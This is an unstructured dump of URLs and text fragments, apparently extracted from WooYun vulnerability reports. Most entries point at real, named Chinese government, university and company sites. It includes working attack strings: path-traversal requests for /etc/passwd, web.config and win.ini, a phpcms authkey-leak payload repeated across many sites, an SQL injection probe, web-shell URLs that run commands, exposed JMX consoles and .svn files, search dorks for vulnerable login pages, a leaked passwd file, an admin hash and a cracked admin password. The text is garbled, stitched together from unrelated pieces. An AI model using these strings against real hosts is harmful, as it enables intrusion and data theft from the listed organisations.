http://www.jzhb.gov.cn:8086/jzepb/js/login.js http://www.cdt.he.cninfo.net/ http://enterprisehw.com/app/install_zh_dev.html http://enterprisehw.com/showlocalnews.php?id=448 http://27.115.105.13:7001/GXReportor/ http://27.115.105.13:7001/GXReportor/jmxroot.jsp jdbc:db2://192.168.8.53:50000 http://111.207.210.120/autoportal/LoginForm.jsp?requestPath=index.jsp http://111.207.210.120/shellinvoker/shellinvoker.jsp http://cj.wyn88.com/ http://**.**.**.**/MyWork/MySet/SysLog.aspx http://**.**.**.**/MyWork/MySet/SysLog http://**.**.**.** http://**.**.**.**:80/MyWork/MySet/SysLog.aspx 
http://demo.raisedreams.com/buyList.aspx?id=1 http://www.douguo.com/uajax/addDelFriend http://wx.wyn88.com/login.jsp http://220.181.67.230:8081/nexus/index.html http://www.billwang.net/alliance.php?act=alliancecase&corporation=0&page=2 http://wooyun.org/bugs/wooyun-2015-0124425 key:9u8FzRw604sHvvBwGpAmN4myqeprO7T0 http://www.csczj.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=vwmcgevkwrndqfyuhtxa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://admin.hzgwyw.com http://admin.hzgwyw.com/api.php?op=get_menu&act=ajax_getlist&callback=vwmcgevkwrndqfyuhtxa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin y0oWIWQGkvz1HwZLlbF9oKRH0hX0P8L3DddmEQXNXzETClD4ogCwdKQyf0:15822:0:99999:7 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin freeswitch:x:501:501::/home/freeswitch:/bin/bash tcpdump:x:72:72::/:/sbin/nologin jdbc:mysql://10.8.5.12:3306/wyn?autoReconnect=true&autoReconnectForPools=true jdbc:mysql://localhost:3306/wyn?autoReconnect=true&autoReconnectForPools=true jdbc:jtds:sqlserver://192.168.3.125:1433/PmsBusiness_View;useLOBs=false 
jdbc:jtds:sqlserver://localhost:1433/pms;useLOBs=false http://www.cdanet.org/phpcq/index.php?zid=9 http://www.lianlianpay.com/www.tar.gz http://www.fsspc.com/more.php?u=investor&c=27 http://www.fsspc.com/admin.php http://www.fsspc.com/en/admin.php ed2k://|file|@admin www.coremail.cn/xssl/index_92.aspx?lcid=1 www.coremail.cn www.coremail.cn https://refund.transforex.com.cn/tra/tra/busTaxfreeApplyAction!view.action?id=0000016090 http://crm.openunion.cn/ http://admin.55bbs.com/login.php http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059111280 http://www.qianjing.com/ http://www.qianjing.com/app/qianjingsirenlicai.html http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView https://github.com/search?p=13&q=mogujie.org&ref=searchresults&type=Code&utf8=%E2%9C%93 https://github.com/liuxueyuan https://github.com/liuxueyuan/rubbish/tree/master/im-server-add http://www.cape.cn/301s2008/301sCH/Article_View.asp?id=1623&lmID=3 https://mail.21vianet.com/owa/auth/logon.aspx http://wifi.wyn88.com/ http://58.83.170.103/pe/yong_hu/User_Login.asp http://cs.wyn88.com/ http://211.143.88.98:8000/admin/.svn/entries http://211.143.88.98:8000/common/.svn/entries http://211.143.88.98:8000/js/.svn/entries http://211.143.88.98:8000/.svn/entries http://211.143.88.98:8000/images/.svn/entries http://www.coremail.cn/的用户列表,恰好有个朋友她们用的就是该邮件系统的邮箱,故让其帮忙申请了个内部邮箱,一番测试果然该处存在xss漏洞,触发简单,容易中招。 http://www.yongcheng.com/member/password/find/type/0/initFlag/1 http://www.zgstats.gov.cn/show.php?id=6161&cid=118 http://www.netentsec.com/en/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://wap.wecash.net http://218.249.47.94/Xianghe/MTK_Phone_KK_UAprofile.xml http://zyyd.media.open.com.cn/picexam/examshowpic_test.asp?picid=196 
http://tongji.weibo.com/apps/index.php/user/check_mail?p_email=test@wooyun.org http://admin.55bbs.com/login.php ftp://218.78.245.3 ftp://218.78.245.7 ftp://218.78.245.13 ftp://218.78.245.29 ftp://218.78.245.75 ftp://218.78.245.85有一些网站源码(webtest目录) ftp://218.78.245.91 ftp://218.78.245.199 http://www.scgrain.gov.cn http://www.hsjyj.gov.cn:8091 http://ajj.ninghai.gov.cn http://www.wsgndj.gov.cn http://jktj.zjwjw.gov.cn http://tzb.ujn.edu.cn http://123.138.77.148/ http://clubapp.qichecdn.com/club4.1/api/group/search?keywords=mm http://www.zofund.com/ st2:2005、2016 http://www.zofund.com/fund/FundPerformance/fundGetChart.do http://homelinktc.sinaapp.com/faq/tc_results.php?type=r&id=3 http://homelinktc.sinaapp.com/faq/tc_results.php?type=r&id=3 http://homelinktc.sinaapp.com/ http://dfsybx.dfmc.com.cn/default.aspx http://qz.pcjoy.cn/topicList.aspx?GT_Id=101#fbtxt http://**.**.**.**:8086/gzcx/yjxgwcx/list.jsp?funType=2 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://**.**.**.**/Manage/quyu_xq_add.aspx?a=1 http://113.105.20.107/weixinPlat/pages/weixinprice/WxPriceCalculate.jsp http://113.105.20.107/is/index.jsp http://113.105.20.107/is/cmd.jsp?pwd=023&cmd=arp%20-a http://weixin.allinpay.com/ http://ocs.allinpay.com:8082/ http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.dgsjcy.gov.cn/ http://co.justeasy.cn http://cs.tnet.hk/时代互联某分站 http://cs.tnet.hk/install/index.php http://www.21yod.com/admin/orderyod.html2 www.wufun.net http://wufun.net/upload/head/1437554797291.jsp http://www.ffan.com,首先注册了个账号,下了订单,里面有取消订单的操作。如下: http://www.yongcheng.com/common/pay http://42.96.171.104:8087/data.rar http://www.equaltax.net/ 
http://admin.equaltax.net/login.htm;jsessionid=61A1295098394490A6148B05D16A6315?admin=login http://bm.ahkj.gov.cn:8080/ahkj/wb/space/LoginAction.do?method=stuentResultLoginPrint&allowNumberId=141010001748313 http://bm.ahkj.gov.cn:8080/ahkj/wb/space/LoginAction.do?method=stuentResultLoginPrint&allowNumberId=141010001748315 http://cards.ecitic.com/shangcheng/ http://www.hxgjj.com/articals.aspx?CatdID=-1&CatID=220 http://www.hxgjj.com/downli.aspx?CatDID=-1&CatID=283&page=1 www.xincheping.com http://www.leiphone.com/ http://dzsw.zsqy.com.cn/websp2/forgetpwd/index http://220.166.160.81:8828/login.html http://www.lygjt.gov.cn/FormData_webMore.aspx?id=383 http://cq.takungpao.com/list.asp?classid=155 http://m.vip.sohu.com/entry https://passport.meituan.com/account/checksignupmobile https://passport.meituan.com/account/check http://m.gongchang.com/resetpwd/ http://chemall.com.cn:80/helpcenter/lawindex.asp?lawtype=%B7%A8%C2%C9 http://joygormusic.ztems.com/,九歌音乐管理系统: http://joygormusic.ztems.com/menu/sysuserrule_loadLogin.action,试了一下,还真有struts2: http://www.zte-s.com.cn/ http://www.zte-s.com.cn/e/master/ http://localhost:86/e/master/login.aspx,貌似需要本地访问 http://www.zte-s.com.cn/e/member/ http://ucoa.uc56.com:8088/Login.aspx http://oa.uc56.com/ http://huawei.hiall.com.cn/cmd.php http://test.cepca.org.cn/Login.aspx http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**//Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config 
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config http://zhongchoucn.org/newsdetail.asp?bid=3&sid=65&xid=&num=325 http://oa.drpeng.com.cn/console/,弱口令binggo! 
http://www.khpb.gov.tw//main_02.php?page=purchase_d&id=MTM=&type= http://183.63.21.234:3618/Login.asp http://www.qjwsgaj.gov.cn/cjdh/index.php?childid=7349&show=newtab http://119.254.70.128/ http://119.254.70.128/Academy/NewsDisplay01.aspx?UniqNo=5 http://220.181.171.216 www.arts.cuhk.edu.hk/~music/en/people.php?cid=4 http://sfq-o2o.wecash.net/GSH-commercialtenant/login.html http://sfq-o2o.wecash.net/GSH-commercialtenant/index.html http://shop.hebeitc.cn http://119.254.70.121(链家微校) inurl:webmall/query.php http://web.abcde.cn/webmall/query.php?typeid=2 http://www.wenzhangseo.com/demo/webmall/query.php?typeid=2 http://web.yunhosting.com/webmall/query.php?catid=1 http://www.jwz.zzxseo.com/webmall/query.php?catid=9 http://www.wenzhangseo.com/demo/webmall/query.php?typeid=6 http://www.xbuynet.com/webmall/query.php?catid=1 http://site.vhostgo.com/webmall/query.php?catid=3 http://web.yunhosting.com/webmall/query.php?catid=34 http://www.fuling520.com/webmall/query.php?catid=45 http://www.fuling520.com/webmall/query.php?catid=45 http://www.slhot.com/webmall/query.php?typeid=2 http://autosite.idchz.com/webmall/detail.php?id=685 http://www.tfwzjs.com/webmall/query.php?catid=13 http://112.91.98.190:8080/gdczsam/ http://112.91.98.190:8080/cK/foot.jsp https://member.hipiao.com/getpass/ http://www.visionsoft.com.cn/ http://o2o-testing.wecash.net/GSH-shopmanager/login.html http://o2o-testing.wecash.net/GSH-shopmanager/index.html http://www.hbggzy.cn/hubeiyewu_test http://www.hbggzy.cn/hubeiyewu_test/Pages/Thems/EffectImages/686110a4-c7dc-437e-8c0f-f966280637d5.aspx https://github.com/suhuadong888/log_recive/blob/9c62621c46d95f8fa367eb9e86dc954f4df0cec4/src/main/resources.prod/db.properties http://116.114.20.51:7006/eapdomain/login.do?method=begin http://116.114.20.52:6603/console/ http://116.114.20.52:6603/jmxroot/jmxroot.jsp jdbc:oracle:thin:@10.48.28.18:1521:db011 http://www.mofine.cn/www.rar http://www.aeonlife.com.cn/product/hotIssue/CVS/Root 
http://www.aeonlife.com.cn/product/hotIssue/CVS/Entries http://www.aeonlife.com.cn/global/js/.svn/entries http://www.aeonlife.com.cn/mis/global/js/.svn/entries http://www.aeonlife.com.cn:80/ www.aeonlife.com.cn http://webchat.wzbank.cn:7001/console/ http://webchat.wzbank.cn:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@20.1.3.68:1522:caller http://www.rchyzf.com/ http://crswx.wyn88.com/livebot/login http://group.wyn88.com/login/login.action http://ekp.wyn88.com/ http://oa.surfingjs.com/Page/Generic/Login.aspx http://www.xianshu.cn/Reg/gereninfo http://snbook.suning.com/web/index.htm http://snbook.suning.com/m/user/get-other.go?dcode=63561988-258B-4F05-8AE1-4432873410DD&versionCode=201001023&custNo=6073048399 http://snbook.suning.cn/images/portrait/3/20/75/22/39206756229_1436860125361.png","expMin":0,"fanCount":0,"birthday":"2015-04-07"},"result":0 http://h.mama100.com/mobile/login/v2loginActionlogin.action http://gdgltj.com/login.html http://202.96.57.32/ www.ganji.com http://www.tysport.gov.cn inurl:community/g-xx.html http://**.**.**.**//common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**//data/fck/File/1.asa http://**.**.**.**//common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media http://**.**.**.**//data/fck/1.php http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**//common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html 
http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://**.**.**.**/common/lib/FCKeditor/editor/fckeditor.html http://heusei.hrbeu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://heusei.hrbeu.edu.cn/api.php?op=phpsso&code=5505UlYACVIBAgFSVAICXQ9WAgRQDV8DAwRVBwACWhFbXQ9fFUlXDl5VWAxCQFkACxUTAFtRTkEAXgBUF0MIRVRADg9OQ1wOVFFFQgdaRQpCGhlIGVYJXAZTER9LEFwJV1EVQk5DXA5UUUVCTGZ1KHNxZ0FRXBVGDFwGQ0MAVgtRUxVKVkgLUR1HQgcWW1EJUx4DGQZUSkIEQRZADBFdSQJKU1FPEH8wfn8RFF1qUQBbW11BWVwLWxESVRtSShBFVEAOD0ZZVwReQFwDEFxfCmlBUAlQWAccEVMHWwYQGQlbXwgWRgAVUxgeVw4LWkJMRFNdBR0FTxhXG0xPQwVLCl8SCAwAX0sPUEZYDQpqQwdeV14AG0EHUAlXFhcEEVYQQhIDG0ZIEAMYEQ http://btr.800best.com/manage/ http://btr.800best.com/i/login.asp http://btr-daxue.800best.com/Account/Login?ReturnUrl=%2f http://a100.aeonlife.com.cn/salesupport/policy/policyTable.jsp?ym=1320302000005008 http://www.jrt2010.com/ http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://**.**.**.**/IneduPortal/Components/albums/AlbumShow.aspx?id=1 http://mail.benlai.com http://www.pclady.com.cn/ http://passport.lexue.tcl.com/Passport/Login.aspx?ru=http%3a http://console.hit.edu.cn/login http://ilife.homelink.com.cn/aigou/?c=index&a=editprice&sid=519&goods_id= http://invest.dyjr.gov.cn/ReadView.asp?id=1797 http://mail.sohu.com http://youxi.widget.baike.com/index.php/search/index?text=1 http://aqe.wyn88.com/Quickas/wefeedback/wefeedback.jsp http://zone.wooyun.org/content/19358 xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance 
http://**.**.**.**/data/settings/settings.xml http://**.**.**.**/adminpanel/ http://webmail.fph.cz/data/settings/settings.xml http://mail.silnice-klatovy.cz/webmail/data/settings/settings.xml https://www.lacucaracha.sk/data/settings/settings.xml https://drivemont.sk/data/settings/settings.xml https://**.**.**.**/data/settings/settings.xml http://**.**.**.**/adminpanel/ http://gps2.gps188.com/gps/doif/myLogin.jsp http://www.ftms.com.cn/information/news_detail.php?id=82 http://www.ftms.com.cn/admin/login.php http://erp.guaguaxiche.com:8000/admin/ http://www.11185.com.cn/user/login.html http://wj.aeonlife.com.cn/wj/shop/member!passwordRetrieve.action http://wj.aeonlife.com.cn http://www.szahotel.com/cn/recruitment/jobs.aspx http://a100.aeonlife.com.cn/indexlis.jsp http://www.fcggjj.com/Website/newslist.jsp?ColumnCode=m0303 http://www.fcggjj.com//console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1384026638791&isNew=false&frameId=wl_console_frame_1384026638792&sidebarFrameId=wl_console_frame_1384026638793&MBean=myweb%3AName%3Dmyweb%2CType%3DDomain http://www.zwcad.com/ http://oa.zwcad.com/console http://gxy.buct.edu.cn,看了下,居然用的supersite7.5,记得以前batch.common.php这个文件是有漏洞的,但是康盛不重视,补了跟没补一样,到目前还是0day,对batch.common.php这个文件注入,联合查询了下,密文出来了,是加过盐的,但是盐也爆出来了,用户名admin,密码ht6789。登录看了下,还是多年前的老系统,可getshell,就不演示了。没有动任何东西,友情检测。 cmccwlan.cn/listch.aspx?from=search&key=123&p=1&ps=10&_=1437632431509 http://219.159.7.18:8001 http://www.cdanet.org/phpcq/login.php?zid=%2079 http://**.**.**.**/bugs/wooyun-2015-0108778 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 http://**.**.**.**/comm_front/supply/view_fw.jsp?market_id=3475 
http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://**.**.**.**/comm_front/baixian/bx_view.jsp?org_id=137 http://house.focus.cn/msgview/8012/331885312.html http://www.ftms.com.cn/splendid/user.php http://www.ftms.com.cn/ www.ftms.com.cn http://www.newv.com.cn/case_enterprise.html inurl:nwc_755_newvexam inurl:nwc_user_cloud inurl:nwc_user_enterpris http://xuexuexue.nipponpaint.com.cn/pass.aspx http://222.195.242.203/pass.aspx http://chrysler.infolearning.so/pass.aspx http://www.mangocity.com/mbrWebCenter/password/init.action http://www.scxcedu.com/showxjhf.aspx?bh=1&mm=2&typeid=3找到一个不用的展示页,吃任何参数都不存在然后跳转到主页。但是发现bh并没有好好过滤,导致了sql注入,闭合一下参数,可以执行多语句。 http://gcxl.hit.edu.cn/jys/Content.asp?id=1 http://gcxl.hit.edu.cn/jpkc/List.asp?Cid=0 http://gcxl.hit.edu.cn:80/jys/WebNews.asp?Nid=1 http://mail.tongbanjie.com http://demo.raisedreams.com/ http://demo.raisedreams.com/user/forgetpwd.aspx http://demo.raisedreams.com/addProject/rewards.aspx?id=107 http://demo.raisedreams.com/addProject/rewards.aspx?id=107%27and%20@@version=0-- http://demo.raisedreams.com/addProject/rewards.aspx?id=107 http://demo.raisedreams.com/addProject/rewards.aspx?id=101 SQL2:/5clib/ebooksearch.action SQL4:/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=??&grade=1 SQL5:/5clib/newsWebManage.action?formAction=newsDetail&Id=8 http://**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0008d874Y&ccode=001004006002 http://**.**.**.**:8081/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0008d42cY&ccode=017016003001009 http://**.**.**.**:8081/5clib/ebooksearch.action http://**.**.**.**:8081/5clib/ebooksearch.action 
http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=121384475476591567839023666490 http://**.**.**.**:8081/paperWeb.action?formAction=paperDetail&Id=122170606864184234595307531536 http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=%E6%B3%95%E5%BE%8B%E4%B8%93%E4%B8%9A%E8%AE%BA%E6%96%87&grade=1 http://**.**.**.**:8081/paperWeb.action?formAction=paperClass&mark=006&classname=7&grade=1 http://**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=8 http://**.**.**.**:8081/newsWebManage.action?formAction=newsDetail&Id=3 http://**.**.**.**:81/newsWebManage.action?formAction=newsDetail&Id=8 http://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini http://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini http://www.hecom.cn:80/phone/culdetail.php?id=199 https://passport.eteams.cn/password https://passport.eteams.cn https://passport.eteams.cn/password/reset?key=YWtsZm9lb0AxNjMuY29tJkhyTWREMGo5a3ExVUw3cH00BGMnIrRHFlYmRvdGdJMFh1Y0NtcHJGeGFPYkdqcmRqU291STVqeVJ0TWc5SnU2ZWo http://www.ccsa.org.cn/tc/baopi.php?baopi_id=4640 http://wuhan.whhd.gov.cn/news/news.jsp?id=Ay247R370wjC55Wv4X04IMr7Ltn777vl http://wuhan.whhd.gov.cn/zt/315_2014/more.jsp?id=115002 http://m.nanapanda.cn/order/list?start=1&limit=5 http://m.nanapanda.cn/pay/wxpay/?orderNo=XXXXXX http://m.nanapanda.cn/user/center http://www.id68.cn http://www.id68.cn/member/memberinfo/editmemberinfo/ http://www.id68.cn/member/memberinfo/editcontact/ app7.moonbasa.com/Apporder.json/getorderlist?pageindex=1&hasit=true&searchDate=0&ordertype=0 http://app7.moonbasa.com/Apporder.json/getorderdetail?ordercode=0031023912&hasit=true http://125.77.202.194:8000/ http://cas.wyn88.com/ http://cas.wyn88.com/ http://t.jiwu.com http://t.jiwu.com/info!edit.action http://211.137.7.84:8080/ErrorInfDownLoad?errorName=/../../../../../../../etc/passwd 
http://211.137.7.84:8080/ErrorInfDownLoad?errorName=/../../../../was/webroot/WEB-INF/web.xml http://www.bwie.com/zscx/search_ceshi.asp http://www.bwie.com/zscx/search_ceshi.asp?studentname=wangpeng&keywords=370828198710053271&keywordsz=378902211199&sjm_code=9249&x=76&y=8”注入点成功,并可以了解到使用SQL http://dec.jlu.edu.cn/baozi/work/firstpage/info_showDetail.jsp?index=13024 http://www.hnfo.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://218.2.102.180/ http://218.2.102.180/one8.jsp http://218.2.102.180/wooyun1.jsp?comment=cmd+%2Fc+dir+E:\bea\user_projects\domains\njfxyc_domain\autodeploy\njfxyc\ inurl:/themes/mskin/login/ inurl://mskin/login/ http://www.mm-office.com:7890/easoa/themes/mskin/login/login.jsp http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp http://oa.hdbp.com/themes/mskin/login/login.jsp http://www.gowellchina.com/oa/themes/mskin/login/login.jsp http://oa.xpngs.com/oa/themes/mskin/login/login.jsp http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp http://oa.hebcs.com:7890/oa/themes/mskin/login/login.jsp http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp http://oa.gongchuang.net:81/oa/themes/mskin/login/login.jsp http://oa.xpngs.com/oa/themes/mskin/login/login.jsp http://oa.fghev.com:7890/oa/themes/mskin/login/login.jsp http://60.173.150.111:7890/easoa/themes/mskin/login/login.jsp http://oa.gdchangda.cn:7890/easoa/themes/mskin/login/login.jsp http://oa.jimbshoes.com/oa/themes/mskin/login/login.jsp?login_error=quit http://oa.gdchangda.cn:7890/easoa/themes/mskin/login/login.jsp http://www.laoken.com:7890/oa/themes/mskin/login/loginFullScreen.jsp?login_error= http://m.pconline.com.cn/member/userAddress/receiveAddresses.htm?id=122144 http://m.pconline.com.cn/member/userAddress/receiveAddresses.htm?id=121144 
http://www.p2p222.com/index.php/LoanApply/index.html http://www.epicc.com.cn/ecenter/views/ecenterClub/loginRegisterNew/login.jsp http://www.wy-fund.com/index.php?m=instarea&c=inbrok&a=init&inst_id=55 www.wy-fund.com/index.php?m=instarea&c=infund&inst_code=80000220 https://hy.allinpay.com/invoker/JMXInvokerServlet hy.allinpay.com/invoker/JMXInvokerServlet system:type=ServerInfo hy.allinpay.com/invoker/JMXInvokerServlet system:type=ServerInfo http://www.zhubaodai.com/ http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3335 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/upPhoto/gethotMore.action?pagenum=1&subjectid=3415 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://**.**.**.**/module/workol/bslist.action?servobj=g&pagenum=1 http://www.cfcgs.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://zdyq.cpnn.com.cn/.svn/entries http://zdyq.cpnn.com.cn/libs/config/database.php http://dlyq.cpnn.com.cn/admin http://faq.minyoun.com/index.php?admin_main http://221.237.157.194:8000/ecrs/ 
https://g.wen.lu/search?newwindow=1&biw=1680&bih=903&noj=1&q=site%3Acits.com.cn++openFile.jsp&oq=site%3Acits.com.cn++openFile.jsp&gs_l=serp.3...6980.6980.0.7138.1.1.0.0.0.0.0.0..0.0.ckpsrh...0...1.1.64.serp..1.0.0.PD9P6TZlS0E http://member.jsj.com.cn/findpwd?type=1 http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://file.jsj.com.cn/css/member/header_footer.css http://file.jsj.com.cn/css/member/login.css http://file.jsj.com.cn/css/public/public.css http://file.jsj.com.cn/images/public/favicon.ico http://file.jsj.com.cn/js/member/login.js http://file.jsj.com.cn/js//jquery.js http://file.jsj.com.cn/js//jsj.js http://file.jsj.com.cn/js/member/member.findpwd2.js http://www.jsj.com.cn/ http://www.jsj.com.cn/BottomLink/about_intro.aspx http://www.jsj.com.cn/BottomLink/D2D/index.html http://www.jsj.com.cn/sitemap.aspx http://gc.jsj.com.cn/bscrm/ebooking/login.aspx http://www.jsj.com.cn/BottomLink/dfdl.aspx http://www.jsj.com.cn/BottomLink/job.aspx http://www.jsj.com.cn/Card/index.html http://www.jsj.com.cn/BottomLink/about_department.aspx http://www.jsj.com.cn/BottomLink/flink.aspx http://forum.jsj.com.cn/ http://www.jsj.com.cn/promotion/cata-zs/index.htm http://file.jsj.com.cn/images/public/ico_footer_img01.gif padding-right:5px http://www.itrust.org.cn/yz/pjwx.asp?wm=2582501947 http://file.jsj.com.cn/images/public/ico_footer_img02.gif padding-right:5px;"/ https://search.szfw.org/cert/l/CX20120801001603001683 http://file.jsj.com.cn/images/public/ico_footer_img03.gif padding-right:5px http://www.anquan.org/s/www.jsj.com.cn http://file.jsj.com.cn/images/public/ico_footer_img04.gif http://float2006.tq.cn/floatcard?adminid=9556114&sort=0 url:http://www.qdzk.gov.cn/qdzk/admin/ http://xxgk.yckfq.gov.cn/index.php?m=zwhd&c=index&a=zmhd_register&siteid=1&mktype=4 admin:e1b4e15af3984ae36808eb1a4c81781a# 
